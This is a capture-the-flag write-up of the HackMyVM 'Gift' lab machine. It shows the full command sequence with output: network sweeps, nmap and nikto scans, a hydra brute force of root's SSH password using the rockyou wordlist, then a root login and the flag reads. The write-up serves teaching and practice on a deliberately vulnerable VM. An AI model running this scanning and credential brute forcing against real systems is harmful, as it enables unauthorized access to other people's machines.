Write-up Gift on HackMyVM
A gift, who doesn’t love that? I think everyone likes to receive a gift from time to time. There is an easy machine on HackMyVM called Gift. This machine caught my attention because of the name. Is there an online store where you have to hack something with SQL injection via gifts?
Getting started
To work neatly, we create a working direcotry before we start our attack.
1
2
3
4
5
6
7
8
┌──(emvee㉿kali)-[~]
└─$ cd Documents/HMV/
┌──(emvee㉿kali)-[~/Documents/HMV]
└─$ mkdir Gift
┌──(emvee㉿kali)-[~/Documents/HMV]
└─$ cd Gift
We should know our own IP address well.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:0e:ca:e6 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
valid_lft 485sec preferred_lft 485sec
inet6 fe80::a00:27ff:fe0e:cae6/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:16:8c:e3:ab brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
Enumeration
Now we’re really going to start! First we start with enumeration of the (virtual) network in which our target is located. We can do this with fping.
1
2
3
4
5
6
7
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ fping -ag 10.0.2.0/24 2> /dev/null
10.0.2.1
10.0.2.2
10.0.2.3
10.0.2.9
10.0.2.15
Once we find an IP address for the target, we assign it to a variable called ip
. This makes working with commands easier.
1
2
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ ip=10.0.2.9
First, let’s find out what ports are open and what services are running. We do this with nmap across all ports.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ sudo nmap -sC -sV -T4 -A -O -p- $ip
[sudo] password for emvee:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 07:51 CEST
Nmap scan report for 10.0.2.9
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
| 256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_ 256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open http nginx
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:14:23:D4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms 10.0.2.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
Only port 22 and port 80 are open. Usually gate 22 is not interesting to attack right away. Let’s update our notes.
- Linux, not yet known which one
- Port 22
- SSH
- Openssh 8.3
- Port 80
- HTTP
- nginx
- Title: site doesn’t have a title (text/html)
Because port 80 is the most interesting, it makes sense to look into this further first. With whatweb we can get an idea of what technology was used.
1
2
3
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ whatweb http://$ip
http://10.0.2.9 [200 OK] Country[RESERVED][ZZ], HTTPServer[nginx], IP[10.0.2.9], nginx
Unfortunately, we have not become much wiser. Maybe Nikto can find something, although I’m not really convinced at the moment.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ nikto -h http://$ip
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.0.2.9
+ Target Hostname: 10.0.2.9
+ Target Port: 80
+ Start Time: 2023-09-12 07:52:52 (GMT2)
---------------------------------------------------------------------------
+ Server: nginx
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2023-09-12 07:53:14 (GMT2) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto did find something, a #wp-config.php
file with possible credentials. So let’s inspect this.
1
2
3
4
5
6
7
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ curl http://$ip/#wp-config.php#
Dont Overthink. Really, Its simple.
<!-- Trust me -->
Okay, I didn’t expect this… with little on a website and port 22 still open, a brute force attack on SSH still remains open. We can use Hydra for this with a username root
and rockyou as a dictionary.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ hydra ssh://$ip -l root -P /usr/share/wordlists/rockyou.txt -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-12 07:55:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://10.0.2.9:22/
[STATUS] 374.00 tries/min, 374 tries in 00:01h, 14344061 to do in 639:14h, 28 active
[22][ssh] host: 10.0.2.9 login: root password: simple
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 23 final worker threads did not complete until end.
[ERROR] 23 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-12 07:56:47
Hydra has found a valid pair of credentials. Let’s add this to our notes and login.
1
root:simple
Initial access
Time to log in as root via the SSH service.
1
2
3
4
5
6
7
8
9
10
┌──(emvee㉿kali)-[~/Documents/HMV/Gift]
└─$ ssh root@$ip
The authenticity of host '10.0.2.9 (10.0.2.9)' can't be established.
ED25519 key fingerprint is SHA256:dXsAE5SaInFUaPinoxhcuNloPhb2/x2JhoGVdcF8Y6I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.9' (ED25519) to the list of known hosts.
root@10.0.2.9's password:
IM AN SSH SERVER
gift:~#
Once we are logged in to the system, we have to check who we are and which machine we are working on.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
gift:~# whoami;id;hostname;ip a;pwd
root
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
gift
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 08:00:27:14:23:d4 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.9/24 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe14:23d4/64 scope link
valid_lft forever preferred_lft forever
/root
gift:~#
We are really root, so we can now capture all the flags.
1
2
3
4
5
6
7
gift:~# ls
root.txt user.txt
gift:~# cat user.txt
<-- Here is the USER flag -->
gift:~# cat root.txt
<-- Here is the ROOT flag -->